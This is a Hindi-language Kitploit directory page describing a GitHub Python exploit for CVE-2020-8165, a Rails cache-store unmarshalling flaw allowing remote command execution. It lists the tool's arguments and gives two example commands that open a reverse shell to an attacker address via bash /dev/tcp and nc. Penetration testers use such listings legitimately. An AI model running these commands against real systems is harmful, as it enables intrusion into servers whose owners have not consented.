Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-8165 — Python एक्सप्लॉइट CVE-2020-8165 के लिए जो Rails MemCacheStore और RedisCacheStore को लक्षित करता है। उपयोगकर्ता-प्रदत्त ऑब्जेक्ट अनमार्शलिंग के माध्यम से argparse-आधारित इंटरफ़ेस के साथ रिमोट कमांड निष्पादन सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/hybryx/cve-2020-8165
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubhybryx/cve-2020-8165

CVE-2020-8165

Python एक्सप्लॉइट CVE-2020-8165 के लिए जो Rails MemCacheStore और RedisCacheStore को लक्षित करता है। उपयोगकर्ता-प्रदत्त ऑब्जेक्ट अनमार्शलिंग के माध्यम से argparse-आधारित इंटरफ़ेस के साथ रिमोट कमांड निष्पादन सक्षम करता है।

रिपॉजिटरी देखें
425 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-8165 Python एक्सप्लॉइट

यह Python3 का उपयोग करके CVE-2020-8165 का शोषण करने के लिए कोड है। यह एक्सप्लॉइट rails < 5.2.4.3, rails < 6.0.3.1 के साथ काम करता है। एक्सप्लॉइट एक हमलावर को MemCacheStore और RedisCacheStore में उपयोगकर्ता-प्रदत्त ऑब्जेक्ट्स को unmarshal करने की अनुमति देता है। यह एक्सप्लॉइट कोड ArgParse का उपयोग करता है ताकि उपयोगकर्ता बहुत आसानी से इस कमजोरी का शोषण कर सके।

उपयोग

इस एक्सप्लॉइट के लिए पाँच तर्क हैं:

  • rHost - रिमोट, लक्ष्य, होस्ट का IP पता
  • rPort - रिमोट, लक्ष्य, होस्ट का पोर्ट नंबर जिस पर Rails चल रहा है
  • email - वह ईमेल जो सेवा में लॉगिन करने के लिए उपयोग किया जाता है
  • password - सेवा में लॉगिन करने के लिए खाते का पासवर्ड
  • cmd - चलाने के लिए कमांड, रिक्त स्थानों को ध्यान में रखते हुए कोट्स में

उदाहरण:

  • python3 exploit.py 10.10.10.X 8080 [email protected] password "bash -c 'bash -i >& /dev/tcp/10.10.X.X/8989 0>&1'"
  • python3 exploit.py 10.10.10.X 8080 [email protected] password "nc 10.10.X.X 8989"

मुख्य श्रेय

मूल CVE विवरण: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165 Pastebin एक्सप्लॉइट कोड जिसे मैंने सुधारा और arg parse जोड़ा: https://pastebin.com/jpHpdBTk

टूल डाउनलोड करें